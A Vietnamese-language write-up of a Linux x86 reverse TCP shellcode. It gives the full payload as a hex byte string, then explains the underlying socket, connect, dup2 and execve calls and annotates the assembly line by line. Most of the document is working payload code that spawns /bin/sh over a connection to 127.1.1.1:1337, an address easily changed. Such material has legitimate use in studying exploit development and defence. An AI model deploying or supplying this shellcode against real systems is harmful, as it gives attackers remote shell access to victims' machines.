
Shell reverse TCP tren Linux	127.1.1.1 1337

"\x6a\x66\x58\x6a\x01\x5b\x31\xd2\x52\x53\x6a\x02\x89\xe1\xcd\x80\x92\xb0\x66\x68\x7f\x01\x01\x01\x66\x68\x05\x39\x43\x66\x53\x89\xe1\x6a\x10\x51\x52\x89\xe1\x43\xcd\x80\x6a\x02\x59\x87\xda\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x41\x89\xca\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"

------------------------------------------------------
Giải thích cách làm bằng code C:
------------------------------------------------------
	1. Tạo 1 TCP socket:
		socket (int socket_family, int socket_type, int protocol)
			protocol 		= IPPROTO_IP	= 0x0
			socket_type 	= SOCK_STREAM	= 0x1
			socket_family 	= AF_INET		= 0x2

	2. Connect tới IP và PORT chỉ định
		connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
			sockfd 	= socket vừa tạo
			addr 	= struct sockaddr {
										__kernel_sa_family_t  sin_family;     /* Address family  =            */
										__be16                sin_port;       /* Port number                  */
										struct in_addr        sin_addr;       /* Internet address             */
									};
					sin_family 	= AF_INET = 0x2
					sin_port	= 1337
					sin_addr	= 127.1.1.1
	
	3. Redirect stdin, stdout và stderr đến socket
		dup2(int oldfd, int newfd)
			oldfd = socket vừa đc accept
			newfd = stdin/stdout/stderr tương ứng với 0/1/2

	4. Chạy /bin/sh để thực hiện lệnh được gửi về từ socket
		execve("bin/sh", null, null)



------------------------------------------------------
Giải thích shellcode
------------------------------------------------------

	push 0x66 													syscall SYS_SOCKETCALL dùng để làm việc với socket + cleanup thanh ghi EAX
	pop eax														sử dụng PUSH/POP tiết kiệm 1 byte so với XOR/MOV :v

	push 0x1 													sys_socket (0x1) + cleanup thanh ghi ebx
	pop ebx
	xor edx, edx												EDX = 0x0

	push edx 													push các tham số cho hàm socket()
	push ebx 													
	push 0x2

	mov ecx, esp 												ECX cần chứa địa chỉ của struct vừa đẩy lên để làm tham số cho lệnh sys_socket
																nên ta lưu ESP vào ECX

	int 0x80 													chạy lệnh sys_socket(2, 1, 0)

	xchg edx, eax 												giá trị trả về của hàm socket sẽ được lưu tại EAX, ta sẽ chuyển nó sang EDX. EAX lúc này chứa 0x2

	mov al, 0x66 												sys_socketcall = 0x66

	push 0x0101017f  											push các tham số cho struct sockaddr
	push word 0x3905 											
	inc ebx          
	push word bx												
	mov ecx, esp 												lưu địa chỉ của struct vào ECX

	push 0x10 													push các tham số cho hàm sys_connect()
	push ecx 
	push edx  

	mov ecx, esp 												lưu địa chỉ các tham số cho hàm sys_connect()

	inc ebx  													sys_connect = 0x3
	
	int 0x80 													chạy lệnh sys_connect(socket, struct*, 16)

	push 0x2
	pop ecx  													set vòng lặp chạy từ 0x2 -> 0x0
 
	xchg ebx,edx 												chuyền địa chỉ của socket được lưu tại EDX vào EBX

loop:
	mov al, 0x3f 												sys_dup2 = 0x3f
	int 0x80     												chạy lệnh sysdup2(EBX, ECX)
	dec ecx	     												ECX--
	jns loop     												vòng lặp: ECX sẽ nhận các giá trị lần lượt là 0x2, 0x1, 0x0

	mov al, 0x0b 												sys_execve = 0x0b

	push 0x68732f2f												push "/bin//sh" lên stack rồi lưu địa chỉ vào EBX
	push 0x6e69622f
	mov ebx, esp 

	inc ecx      
	mov edx, ecx 												EDX = 0

	int 0x80 													chạy lệnh sys_execve()

